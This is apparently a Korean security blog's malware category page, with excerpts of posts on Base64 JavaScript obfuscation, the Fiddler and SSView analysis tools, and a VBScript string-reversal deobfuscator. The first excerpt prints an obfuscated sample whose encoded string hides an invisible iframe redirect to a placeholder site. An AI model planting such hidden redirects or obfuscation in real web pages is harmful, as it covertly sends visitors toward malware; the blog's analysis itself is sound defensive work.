본문 바로가기

Information Security/Malware40

Base64를 이용한 JavaScript 난독화 1. 개요 Base64 인코딩 알고리즘을 이용하여 JavaScript로 구현, 이를 난독화 형태로 사용 되는 것을 발견하였다. 발견된 소스코드에서 악성 소프트웨어 유포지로 XSS를 발생시키는 코드를 수정한 소스코드이다. (* 여기서 XSS는 피해자를 공격자가 설정한 사이트로 유도하는 스크립트를 사용한 것을 말한다.) var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var EmbR="PGlmcmFtZSBzcmM9Imh0dHA6Ly93d3cuZXhhbXBsZS5jby5rciIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg==";var AcR5="";.. 2013. 9. 24.
Network Tool - Fiddler Web Debugger 1. Intro 트래픽 분석에 사용하는 도구들은 많지만, 조금 더 가시적이고 눈에 잘 보이는 도구 혹은 간단한(Simple) 도구가 필요하다. Wireshark와 같이 Raw에 가까운 트래픽과 강력한 기능들을 사용하기도하고, NirSoft의 SmartSniff와 같이 아주 간단하게 사용 할 수도 있다. 하지만 이 둘을 섞어 놓은 도구가 있다면 그 또한 매력적으로 다가올 것이다. 그 도구가 Fiddler라고 생각한다. 해외 블로거 중 취약점 및 Exploit Toolkit 분석에 유명한 "Malware don't need Coffee"에서 분석에 대한 많은 부분을 Fiddler가 차지하고 있다. 2. Platform All of them. 3. Create Company Telerik 4. Screensh.. 2013. 9. 17.
Analysis Tool - Structured Storage Viewer(SSView) 1. 소개 이 툴은 MS OLE(Microsoft Object Linking and Embedding) Structured Storage 기반의 파일들을 분석하는데 사용한다. hwp, doc, ppt, xls와 같은 문서형태의 파일을 정적분석에 사용하는 도구이다. 아쉽게도 docx, pptx, xlsx 등 파일 형식이 달라진 형태들은 분석이 되지 않는다. 2. Platform Windows OS - GUI 3. 제작사 MiTeC 4. Screenshot 5. Reference [1] SSView : http://www.mitec.cz/ssv.html[2] MS OLE : http://msdn.microsoft.com/en-us/library/dd942265.aspx 2013. 9. 15.
VBscript를 이용하여 역순코드로 만든 난독화 알고리즘 vbscript wei = ""function UnEncode(cc)for i = 1 to len(cc)if mid(cc,i,1)"มี" thentemp = Mid(cc, i, 1) + tempelsetemp=vbcrlf&tempend ifnextUnEncode=tempend functiondocument.write(UnEncode(wei)) 2013. 8. 30.